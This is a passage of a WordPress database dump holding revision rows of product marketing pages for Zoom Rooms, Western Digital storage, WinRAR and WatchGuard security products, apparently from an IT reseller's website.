laptop or mobile device.</p>\n<h4>Interoperability with any video system</h4>\n<p>Communicate with existing SIP or H.323 systems</p>\n<h4>Meet with anyone</h4>\n<p>Include remote participants on desktop, mobile, or other conference room systems.</p>\n<h4>One touch to start meetings</h4>\n<p>Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.</p>\n<h4>Centralized management</h4>\n<p>Get the overview status and management of deployed conference rooms in a single admin console.</p>\n&nbsp;\n<h3>Already have an existing video conference room system?</h3>\nUse Zoomâ€™s Conference Room Connector to extend your standards-based conference systems to the cloud. Zoomâ€™s Conference Room Connector helps organizations leverage existing products through its life-cycle while delivering a consistent and unified communication experience.\n&nbsp;\n<h3>Zoom Rooms includes the following value-added services at no additional cost.</h3>\n<h4>Digital Signage</h4>\nDigital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.\n<ul>\n 	<li>Leverage room displays when not in use</li>\n 	<li>Manage displays at scale or individually</li>\n 	<li>Unlimited amount of displays supported (both in and out of conference rooms)</li>\n</ul>\n<h4>Scheduling Display</h4>\nEnd scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.\n<h4>Make interactive collaboration easy with touch screens</h4>\nPower up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation all at the tip of your fingers.\n<h4>Flawless video conferencing for every space</h4>\nUnleash the power of cloud-based video conferencing anywhere work gets done.\n[maxbutton id=\"1\" ]','Zoom','','inherit','closed','closed','','1620-revision-v1','','','2019-03-11 15:00:29','2019-03-11 07:00:29','',1620,'https://bintara.com.my/blog/2019/03/11/1620-revision-v1/',0,'revision','',0),(3055,1,'2019-03-11 15:34:35','2019-03-11 07:34:35','<h2>Zoom for the Conference Room</h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing</h3>https://youtu.be/yRQGXlJS-xI<h3>Simple, flexible set up</h3><p>Build the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.</p><h3>Modern capabilities</h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.</p><h3>Happy, productive users</h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.</p><h4>HD video and audio</h4><p>Bring high quality video, audio, and web conferencing to your existing rooms.</p><h4>Wireless sharing</h4><p>Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.</p><h4>Interoperability with any video system</h4><p>Communicate with existing SIP or H.323 systems</p><h4>Meet with anyone</h4><p>Include remote participants on desktop, mobile, or other conference room systems.</p><h4>One touch to start meetings</h4><p>Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.</p><h4>Centralized management</h4><p>Get the overview status and management of deployed conference rooms in a single admin console</p>		\n			<h3>Zoom Rooms includes the following value-added services at no additional cost.</h3>		\n		<h3>Digital Signage</h3><p>Digital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.</p><ul><li>Leverage room displays when not in use</li><li>Manage displays at scale or individually</li><li>Unlimited amount of displays supported (both in and out of conference rooms)</li></ul><h3>Scheduling Display</h3><p>End scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.</p><h3>Make interactive collaboration easy with touch screens</h3><p>Power up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotationÂ  all at the tip of your fingers.</p>https://youtu.be/gezS90Pg_fk<p>[maxbutton id=\"1\" ]</p>','Zoom','','inherit','closed','closed','','1620-revision-v1','','','2019-03-11 15:34:35','2019-03-11 07:34:35','',1620,'https://bintara.com.my/blog/2019/03/11/1620-revision-v1/',0,'revision','',0),(2145,1,'2018-12-14 11:25:50','2018-12-14 03:25:50','<h3>Zoom for theÂ Conference Room</h3>\r\n<h4>Simple, flexible set up</h4>\r\nBuild the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.\r\n<h4>Modern capabilities</h4>\r\nDeploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.\r\n<h4>Happy, productive users</h4>\r\nWe focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.\r\n\r\n&nbsp;\r\n<h3>Capabilities that enhance the way people work</h3>\r\n<h4 class=\"mb-1 mt-0\">HD video and audio</h4>\r\n<p class=\"mt-1 mb-5\">Bring high quality video, audio, and web conferencing to your existing rooms.</p>\r\n\r\n<h4 class=\"mb-1 mt-0\">Wireless sharing</h4>\r\n<p class=\"mt-1 mb-5\">Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.</p>\r\n\r\n<h4 class=\"mb-1 mt-0\">Interoperability with any video system</h4>\r\n<p class=\"mt-1 mb-5\">Communicate with existing SIP or H.323 systems</p>\r\n\r\n<h4 class=\"mb-1 mt-0\">Meet with anyone</h4>\r\n<p class=\"mt-1 mb-5\">Include remote participants on desktop, mobile, or other conference room systems.</p>\r\n\r\n<h4 class=\"mb-1 mt-0\">One touch to start meetings</h4>\r\n<p class=\"mt-1 mb-5\">Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.</p>\r\n\r\n<h4 class=\"mb-1 mt-0\">Centralized management</h4>\r\n<p class=\"mt-1 mb-5\">Get the overview status and management of deployed conference rooms in a single admin console.</p>\r\n&nbsp;\r\n<h3>Already have an existing video conference room system?</h3>\r\nUse Zoomâ€™s Conference Room Connector to extend your standards-based conference systems to the cloud. Zoomâ€™s Conference Room Connector helps organizations leverage existing products through its life-cycle while delivering a consistent and unified communication experience.\r\n\r\n&nbsp;\r\n<h3>Zoom Rooms includes the following value-added services at no additional cost.</h3>\r\n<h4>Digital Signage</h4>\r\nDigital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.\r\n<ul>\r\n 	<li>Leverage room displays when not in use</li>\r\n 	<li>Manage displays at scale or individually</li>\r\n 	<li>Unlimited amount of displays supported (both in and out of conference rooms)</li>\r\n</ul>\r\n<h4>Scheduling Display</h4>\r\nEnd scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.\r\n<h4>Make interactive collaboration easy with touch screens</h4>\r\nPower up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation all at the tip of your fingers.\r\n<h4>Flawless video conferencing for every space</h4>\r\nUnleash the power of cloud-based video conferencing anywhere work gets done.','Zoom','','inherit','closed','closed','','1620-revision-v1','','','2018-12-14 11:25:50','2018-12-14 03:25:50','',1620,'https://bintara.com.my/blog/2018/12/14/1620-revision-v1/',0,'revision','',0),(2146,1,'2018-12-14 11:26:35','2018-12-14 03:26:35','<h3>Zoom for theÂ Conference Room</h3>\r\n<h4>Simple, flexible set up</h4>\r\nBuild the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.\r\n<h4>Modern capabilities</h4>\r\nDeploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.\r\n<h4>Happy, productive users</h4>\r\nWe focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.\r\n\r\n&nbsp;\r\n<h3>Capabilities that enhance the way people work</h3>\r\n<h4 class=\"mb-1 mt-0\">HD video and audio</h4>\r\n<p class=\"mt-1 mb-5\">Bring high quality video, audio, and web conferencing to your existing rooms.</p>\r\n\r\n<h4 class=\"mb-1 mt-0\">Wireless sharing</h4>\r\n<p class=\"mt-1 mb-5\">Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.</p>\r\n\r\n<h4 class=\"mb-1 mt-0\">Interoperability with any video system</h4>\r\n<p class=\"mt-1 mb-5\">Communicate with existing SIP or H.323 systems</p>\r\n\r\n<h4 class=\"mb-1 mt-0\">Meet with anyone</h4>\r\n<p class=\"mt-1 mb-5\">Include remote participants on desktop, mobile, or other conference room systems.</p>\r\n\r\n<h4 class=\"mb-1 mt-0\">One touch to start meetings</h4>\r\n<p class=\"mt-1 mb-5\">Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.</p>\r\n\r\n<h4 class=\"mb-1 mt-0\">Centralized management</h4>\r\n<p class=\"mt-1 mb-5\">Get the overview status and management of deployed conference rooms in a single admin console.</p>\r\n&nbsp;\r\n<h3>Already have an existing video conference room system?</h3>\r\nUse Zoomâ€™s Conference Room Connector to extend your standards-based conference systems to the cloud. Zoomâ€™s Conference Room Connector helps organizations leverage existing products through its life-cycle while delivering a consistent and unified communication experience.\r\n\r\n&nbsp;\r\n<h3>Zoom Rooms includes the following value-added services at no additional cost.</h3>\r\n<h4>Digital Signage</h4>\r\nDigital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.\r\n<ul>\r\n 	<li>Leverage room displays when not in use</li>\r\n 	<li>Manage displays at scale or individually</li>\r\n 	<li>Unlimited amount of displays supported (both in and out of conference rooms)</li>\r\n</ul>\r\n<h4>Scheduling Display</h4>\r\nEnd scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.\r\n<h4>Make interactive collaboration easy with touch screens</h4>\r\nPower up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation all at the tip of your fingers.\r\n<h4>Flawless video conferencing for every space</h4>\r\nUnleash the power of cloud-based video conferencing anywhere work gets done.\r\n\r\n[maxbutton id=\"1\" ]','Zoom','','inherit','closed','closed','','1620-revision-v1','','','2018-12-14 11:26:35','2018-12-14 03:26:35','',1620,'https://bintara.com.my/blog/2018/12/14/1620-revision-v1/',0,'revision','',0),(2152,1,'2018-12-14 12:04:31','2018-12-14 04:04:31','<h3>Data Readiness Can Lead to Business Transformation</h3>\r\n<h4><span style=\"text-decoration: underline;\">Data Center</span></h4>\r\n<h4>Storage Systems</h4>\r\nUnleash the power of your data. With our comprehensive line up of storage systems - from all-flash, to hybrid to object storage - you can transform data into actionable information faster and achieve new levels of efficiency and costs.\r\n<h4>Storage Platforms</h4>\r\nBig Data. Fast Data. The digital universe continues to expand exponentially and so does its potential. We have a complete portfolio of storage platforms and servers designed to thrive under the most demanding performance and capacity needs.\r\n<h4>Data Center Drives</h4>\r\nAccelerate applications, analytics and data access with Western Digitalâ€™s broad portfolio of Ultrastar HDDs, SSDs and memory extension drives. The capacity and performance to help your data thrive.\r\n\r\n&nbsp;\r\n<h4><span style=\"text-decoration: underline;\">Mobility, Edge &amp; Computing</span></h4>\r\n<h4>Internal Drives</h4>\r\nOur internal drives are purpose-built to enable your data to thrive. We provide the speed, capacity, and performance, so you can drive innovation and satisfy new demands.\r\n<h4>Embedded &amp; Removable Flash</h4>\r\nData is everywhere multiplying at an astonishing rate. The complexity of data is driving innovation as businesses seek to extract more value and achieve new breakthroughs by harnessing the power of data.','Western Digital','','inherit','closed','closed','','1617-revision-v1','','','2018-12-14 12:04:31','2018-12-14 04:04:31','',1617,'https://bintara.com.my/blog/2018/12/14/1617-revision-v1/',0,'revision','',0),(2148,1,'2018-12-14 11:37:50','2018-12-14 03:37:50','WinRAR is an archiving utility that completely supports RAR and ZIP archives and is able to unpack CAB, ARJ, LZH, TAR, GZ, ACE, UUE, BZ2, JAR, ISO, 7Z, Z archives. It consistently makes smaller archives than the competition, saving disk space and transmission costs.\r\n\r\nWinRAR offers a graphic interactive interface utilizing mouse and menus as well as the command line interface. WinRAR is easier to use than many other archivers with the inclusion of a special \"Wizard\" mode which allows instant access to the basic archiving functions through a simple question and answer procedure.\r\n\r\nWinRAR offers you the benefit of industry strength archive encryption using AES (Advanced Encryption Standard) with a key of 128 bits. It supports files and archives up to 8,589 billion gigabytes in size. It also offers the ability to create selfextracting and multivolume archives. With recovery record and recovery volumes, you can reconstruct even physically damaged archives.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','WinRAR','','inherit','closed','closed','','1618-revision-v1','','','2018-12-14 11:37:50','2018-12-14 03:37:50','',1618,'https://bintara.com.my/blog/2018/12/14/1618-revision-v1/',0,'revision','',0),(2149,1,'2018-12-14 11:38:20','2018-12-14 03:38:20','<strong>WinRAR</strong> is an archiving utility that completely supports RAR and ZIP archives and is able to unpack CAB, ARJ, LZH, TAR, GZ, ACE, UUE, BZ2, JAR, ISO, 7Z, Z archives. It consistently makes smaller archives than the competition, saving disk space and transmission costs.\r\n\r\nWinRAR offers a graphic interactive interface utilizing mouse and menus as well as the command line interface. WinRAR is easier to use than many other archivers with the inclusion of a special \"Wizard\" mode which allows instant access to the basic archiving functions through a simple question and answer procedure.\r\n\r\nWinRAR offers you the benefit of industry strength archive encryption using AES (Advanced Encryption Standard) with a key of 128 bits. It supports files and archives up to 8,589 billion gigabytes in size. It also offers the ability to create selfextracting and multivolume archives. With recovery record and recovery volumes, you can reconstruct even physically damaged archives.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','WinRAR','','inherit','closed','closed','','1618-revision-v1','','','2018-12-14 11:38:20','2018-12-14 03:38:20','',1618,'https://bintara.com.my/blog/2018/12/14/1618-revision-v1/',0,'revision','',0),(2150,1,'2018-12-14 11:44:11','2018-12-14 03:44:11','<strong>WinRAR</strong> is an archiving utility that completely supports RAR and ZIP archives and is able to unpack CAB, ARJ, LZH, TAR, GZ, ACE, UUE, BZ2, JAR, ISO, 7Z, Z archives. It consistently makes smaller archives than the competition, saving disk space and transmission costs.\r\n\r\nWinRAR offers a graphic interactive interface utilizing mouse and menus as well as the command line interface. WinRAR is easier to use than many other archivers with the inclusion of a special \"Wizard\" mode which allows instant access to the basic archiving functions through a simple question and answer procedure.\r\n\r\nWinRAR offers you the benefit of industry strength archive encryption using AES (Advanced Encryption Standard) with a key of 128 bits. It supports files and archives up to 8,589 billion gigabytes in size. It also offers the ability to create selfextracting and multivolume archives. With recovery record and recovery volumes, you can reconstruct even physically damaged archives.\r\n\r\n&nbsp;\r\n<p class=\"tplain\"><b>MULTI-USER LICENSES</b></p>\r\n<p class=\"tplain\">The user purchases a number of usage licenses for use, by the purchaser or the purchaser\'s employees on the same number of computers. In a network (server/client) environment you must purchase a license copy for each separate client (workstation) on which RAR is installed, used, or accessed.</p>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','WinRAR','','inherit','closed','closed','','1618-revision-v1','','','2018-12-14 11:44:11','2018-12-14 03:44:11','',1618,'https://bintara.com.my/blog/2018/12/14/1618-revision-v1/',0,'revision','',0),(2153,1,'2018-12-14 12:05:33','2018-12-14 04:05:33','<h3>Data Readiness Can Lead to Business Transformation</h3>\r\n<h4></h4>\r\n<h4><span style=\"text-decoration: underline;\">Data Center</span></h4>\r\n<h4>Storage Systems</h4>\r\nUnleash the power of your data. With our comprehensive line up of storage systems - from all-flash, to hybrid to object storage - you can transform data into actionable information faster and achieve new levels of efficiency and costs.\r\n<h4>Storage Platforms</h4>\r\nBig Data. Fast Data. The digital universe continues to expand exponentially and so does its potential. We have a complete portfolio of storage platforms and servers designed to thrive under the most demanding performance and capacity needs.\r\n<h4>Data Center Drives</h4>\r\nAccelerate applications, analytics and data access with Western Digitalâ€™s broad portfolio of Ultrastar HDDs, SSDs and memory extension drives. The capacity and performance to help your data thrive.\r\n\r\n&nbsp;\r\n<h4><span style=\"text-decoration: underline;\">Mobility, Edge &amp; Computing</span></h4>\r\n<h4>Internal Drives</h4>\r\nOur internal drives are purpose-built to enable your data to thrive. We provide the speed, capacity, and performance, so you can drive innovation and satisfy new demands.\r\n<h4>Embedded &amp; Removable Flash</h4>\r\nData is everywhere multiplying at an astonishing rate. The complexity of data is driving innovation as businesses seek to extract more value and achieve new breakthroughs by harnessing the power of data.','Western Digital','','inherit','closed','closed','','1617-revision-v1','','','2018-12-14 12:05:33','2018-12-14 04:05:33','',1617,'https://bintara.com.my/blog/2018/12/14/1617-revision-v1/',0,'revision','',0),(2154,1,'2018-12-14 12:21:16','2018-12-14 04:21:16','<div class=\"prod-headline\">\r\n<div class=\"field field-name-field-prod-headline field-type-text field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n<h3>Solutions That Evolve as Industry Needs Change</h3>\r\n<h4>Education</h4>\r\n<p class=\"extra-pad\">Educational institutions strive to create high quality learning environments with easy access to wired and wireless online research and communication tools â€“ but with this access, organization must deploy the necessary measures to keep students safe from hostile threats and inappropriate content.</p>\r\n\r\n<div class=\"row\">\r\n<div class=\"col-xs-12 col-sm-6 col-md-6 col-lg-6 \">\r\n<h4>Finance</h4>\r\n<p class=\"extra-pad\">While many financial services organizations today are eager to leverage FinTech (Financial Technology) to delight customers with new banking options, keeping pace with industry innovation does not come without reputational, regulatory, and operational considerations that effective security programs cannot ignore.</p>\r\n\r\n<h4>Healthcare</h4>\r\n<p class=\"extra-pad\">The potential of emerging technology within the healthcare sector is boundless, transforming care delivery, patient satisfaction, and the very industry itself. But for all the promise, healthcare facilities cannot lose sight of the continuing effort to secure network resources and ensure privacy.</p>\r\n\r\n<h4>Retail &amp; Hospitality</h4>\r\n<p class=\"extra-pad\">When a retail or hospitality business suffers a data breach, costs can quickly escalate, business opportunities can be squandered, and customer loyalties can sour. Whether the cyber attack is delivered over Wi-Fi, at a POS station, or through phishing emails to internal users, the result can devastate a business.</p>\r\n\r\n<h4>State and Local Government</h4>\r\n<p class=\"extra-pad\">State and local government agencies collect and store a great deal of sensitive information about citizens, often more than even the federal government. But because they also have a fundamental duty to protect not just their data, but more critically their people, the matter of cyber security becomes much more than an IT issue â€“ it becomes an issue of public safety.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"row\">\r\n<div class=\"col-xs-12 col-sm-6 col-md-6 col-lg-6 \"></div>\r\n</div>\r\n<h3 class=\"page_title\">Network Security</h3>\r\n<h4>One Platform, Total Security</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"prod-intro-center\">\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nOur unique approach to network security focuses on bringing best-in-class, enterprise-grade security to any organization, regardless of size or technical expertise. Ideal for SMBs and distributed enterprise organizations, our award-winning Unified Threat Management (UTM) appliances are designed from the ground up to focus on ease of deployment, use, and ongoing management, in addition to providing the strongest security possible.\r\n<h3 class=\"page_title\">Multi-Factor Authentication</h3>\r\n<div class=\"prod-headline\">\r\n<div class=\"field field-name-field-prod-headline field-type-text field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n<h4><strong>Keep</strong> Criminals<strong> Outside Your Network with AuthPoint</strong></h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"prod-intro-center\">\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nOur unique multi-factor authentication (MFA) solution not only helps to reduce the likelihood of network disruptions and data breaches arising from lost or stolen credentials, but we deliver this important capability entirely from the Cloud for easy set-up and management. AuthPoint goes beyond traditional 2-Factor Authentication (2FA) by considering innovative ways to positively identify users, and our large ecosystem of 3rd party integrations means that you can use MFA to protect access to the network, VPNs, and Cloud applications. Even non-technical users find the AuthPoint mobile app easy and convenient to use!\r\n\r\nUltimately, WatchGuard AuthPoint is the right solution at the right time to make MFA a reality for the businesses who desperately need it to block attacks.\r\n\r\n</div>\r\n<h3 class=\"page_title\">Secure Wi-Fi</h3>\r\n<div class=\"prod-headline\">\r\n<div class=\"field field-name-field-prod-headline field-type-text field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n<h4><strong>Your Trusted Wireless Environment Starts with Secure, Cloud-Managed Wi-Fi</strong></h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"prod-intro-center\">\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nA Trusted Wireless Environment is a framework for building a complete Wi-Fi network that isÂ <strong>fast, easy to manage</strong>, and most importantly,Â <strong>secure</strong>. Businesses face the responsibility to build Trusted Wireless Environments protecting their employees and customers from hackers who easily exploit the weak or non-existent security of traditional Wi-Fi networks. With security and performance at the heart of our products, WatchGuard is the only company to provide the technology and solutions that you can use to build a Trusted Wireless Environment â€“ delivering on each of the three core pillars ofÂ <strong>market-leading performance, scalable management, and verified comprehensive security.</strong>\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Watchguard','','inherit','closed','closed','','1612-autosave-v1','','','2018-12-14 12:21:16','2018-12-14 04:21:16','',1612,'https://bintara.com.my/blog/2018/12/14/1612-autosave-v1/',0,'revision','',0),(2155,1,'2018-12-14 12:16:20','2018-12-14 04:16:20','<div class=\"prod-headline\">\r\n<div class=\"field field-name-field-prod-headline field-type-text field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n<h3 class=\"page_title\">Network Security</h3>\r\n<h4>One Platform, Total Security</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"prod-intro-center\">\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nOur unique approach to network security focuses on bringing best-in-class, enterprise-grade security to any organization, regardless of size or technical expertise. Ideal for SMBs and distributed enterprise organizations, our award-winning Unified Threat Management (UTM) appliances are designed from the ground up to focus on ease of deployment, use, and ongoing management, in addition to providing the strongest security possible.\r\n<h3 class=\"page_title\">Multi-Factor Authentication</h3>\r\n<div class=\"prod-headline\">\r\n<div class=\"field field-name-field-prod-headline field-type-text field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n<h4><strong>Keep</strong> Criminals<strong> Outside Your Network with AuthPoint</strong></h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"prod-intro-center\">\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nOur unique multi-factor authentication (MFA) solution not only helps to reduce the likelihood of network disruptions and data breaches arising from lost or stolen credentials, but we deliver this important capability entirely from the Cloud for easy set-up and management. AuthPoint goes beyond traditional 2-Factor Authentication (2FA) by considering innovative ways to positively identify users, and our large ecosystem of 3rd party integrations means that you can use MFA to protect access to the network, VPNs, and Cloud applications. Even non-technical users find the AuthPoint mobile app easy and convenient to use!\r\n\r\nUltimately, WatchGuard AuthPoint is the right solution at the right time to make MFA a reality for the businesses who desperately need it to block attacks.\r\n\r\n</div>\r\n<h3 class=\"page_title\">Secure Wi-Fi</h3>\r\n<div class=\"prod-headline\">\r\n<div class=\"field field-name-field-prod-headline field-type-text field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n<h4><strong>Your Trusted Wireless Environment Starts with Secure, Cloud-Managed Wi-Fi</strong></h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"prod-intro-center\">\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nA Trusted Wireless Environment is a framework for building a complete Wi-Fi network that isÂ <strong>fast, easy to manage</strong>, and most importantly,Â <strong>secure</strong>. Businesses face the responsibility to build Trusted Wireless Environments protecting their employees and customers from hackers who easily exploit the weak or non-existent security of traditional Wi-Fi networks. With security and performance at the heart of our products, WatchGuard is the only company to provide the technology and solutions that you can use to build a Trusted Wireless Environment â€“ delivering on each of the three core pillars ofÂ <strong>market-leading performance, scalable management, and verified comprehensive security.</strong>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Watchguard','','inherit','closed','closed','','1612-revision-v1','','','2018-12-14 12:16:20','2018-12-14 04:16:20','',1612,'https://bintara.com.my/blog/2018/12/14/1612-revision-v1/',0,'revision','',0),(2156,1,'2018-12-14 12:21:36','2018-12-14 04:21:36','<div class=\"prod-headline\">\r\n<div class=\"field field-name-field-prod-headline field-type-text field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n<h3>Solutions That Evolve as Industry Needs Change</h3>\r\n<h4>Education</h4>\r\n<p class=\"extra-pad\">Educational institutions strive to create high quality learning environments with easy access to wired and wireless online research and communication tools â€“ but with this access, organization must deploy the necessary measures to keep students safe from hostile threats and inappropriate content.</p>\r\n\r\n<div class=\"row\">\r\n<div class=\"col-xs-12 col-sm-6 col-md-6 col-lg-6 \">\r\n<h4>Finance</h4>\r\n<p class=\"extra-pad\">While many financial services organizations today are eager to leverage FinTech (Financial Technology) to delight customers with new banking options, keeping pace with industry innovation does not come without reputational, regulatory, and operational considerations that effective security programs cannot ignore.</p>\r\n\r\n<h4>Healthcare</h4>\r\n<p class=\"extra-pad\">The potential of emerging technology within the healthcare sector is boundless, transforming care delivery, patient satisfaction, and the very industry itself. But for all the promise, healthcare facilities cannot lose sight of the continuing effort to secure network resources and ensure privacy.</p>\r\n\r\n<h4>Retail &amp; Hospitality</h4>\r\n<p class=\"extra-pad\">When a retail or hospitality business suffers a data breach, costs can quickly escalate, business opportunities can be squandered, and customer loyalties can sour. Whether the cyber attack is delivered over Wi-Fi, at a POS station, or through phishing emails to internal users, the result can devastate a business.</p>\r\n\r\n<h4>State and Local Government</h4>\r\n<p class=\"extra-pad\">State and local government agencies collect and store a great deal of sensitive information about citizens, often more than even the federal government. But because they also have a fundamental duty to protect not just their data, but more critically their people, the matter of cyber security becomes much more than an IT issue â€“ it becomes an issue of public safety.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"row\">\r\n<div class=\"col-xs-12 col-sm-6 col-md-6 col-lg-6 \"></div>\r\n</div>\r\n<h3 class=\"page_title\">Network Security</h3>\r\n<h4>One Platform, Total Security</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"prod-intro-center\">\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nOur unique approach to network security focuses on bringing best-in-class, enterprise-grade security to any organization, regardless of size or technical expertise. Ideal for SMBs and distributed enterprise organizations, our award-winning Unified Threat Management (UTM) appliances are designed from the ground up to focus on ease of deployment, use, and ongoing management, in addition to providing the strongest security possible.\r\n<h3 class=\"page_title\">Multi-Factor Authentication</h3>\r\n<div class=\"prod-headline\">\r\n<div class=\"field field-name-field-prod-headline field-type-text field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n<h4><strong>Keep</strong> Criminals<strong> Outside Your Network with AuthPoint</strong></h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"prod-intro-center\">\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nOur unique multi-factor authentication (MFA) solution not only helps to reduce the likelihood of network disruptions and data breaches arising from lost or stolen credentials, but we deliver this important capability entirely from the Cloud for easy set-up and management. AuthPoint goes beyond traditional 2-Factor Authentication (2FA) by considering innovative ways to positively identify users, and our large ecosystem of 3rd party integrations means that you can use MFA to protect access to the network, VPNs, and Cloud applications. Even non-technical users find the AuthPoint mobile app easy and convenient to use!\r\n\r\nUltimately, WatchGuard AuthPoint is the right solution at the right time to make MFA a reality for the businesses who desperately need it to block attacks.\r\n\r\n</div>\r\n<h3 class=\"page_title\">Secure Wi-Fi</h3>\r\n<div class=\"prod-headline\">\r\n<div class=\"field field-name-field-prod-headline field-type-text field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n<h4><strong>Your Trusted Wireless Environment Starts with Secure, Cloud-Managed Wi-Fi</strong></h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"prod-intro-center\">\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nA Trusted Wireless Environment is a framework for building a complete Wi-Fi network that isÂ <strong>fast, easy to manage</strong>, and most importantly,Â <strong>secure</strong>. Businesses face the responsibility to build Trusted Wireless Environments protecting their employees and customers from hackers who easily exploit the weak or non-existent security of traditional Wi-Fi networks. With security and performance at the heart of our products, WatchGuard is the only company to provide the technology and solutions that you can use to build a Trusted Wireless Environment â€“ delivering on each of the three core pillars ofÂ <strong>market-leading performance, scalable management, and verified comprehensive security.</strong>\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Watchguard','','inherit','closed','closed','','1612-revision-v1','','','2018-12-14 12:21:36','2018-12-14 04:21:36','',1612,'https://bintara.com.my/blog/2018/12/14/1612-revision-v1/',0,'revision','',0),(2157,1,'2018-12-14 12:21:58','2018-12-14 04:21:58','<h3>Data Readiness Can Lead to Business Transformation</h3>\n<h4></h4>\n<h4><span style=\"text-decoration: underline;\">Data Center</span></h4>\n<h4>Storage Systems</h4>\nUnleash the power of your data. With our comprehensive line up of storage systems - from all-flash, to hybrid to object storage - you can transform data into actionable information faster and achieve new levels of efficiency and costs.\n<h4>Storage Platforms</h4>\nBig Data. Fast Data. The digital universe continues to expand exponentially and so does its potential. We have a complete portfolio of storage platforms and servers designed to thrive under the most demanding performance and capacity needs.\n<h4>Data Center Drives</h4>\nAccelerate applications, analytics and data access with Western Digitalâ€™s broad portfolio of Ultrastar HDDs, SSDs and memory extension drives. The capacity and performance to help your data thrive.\n\n&nbsp;\n<h4><span style=\"text-decoration: 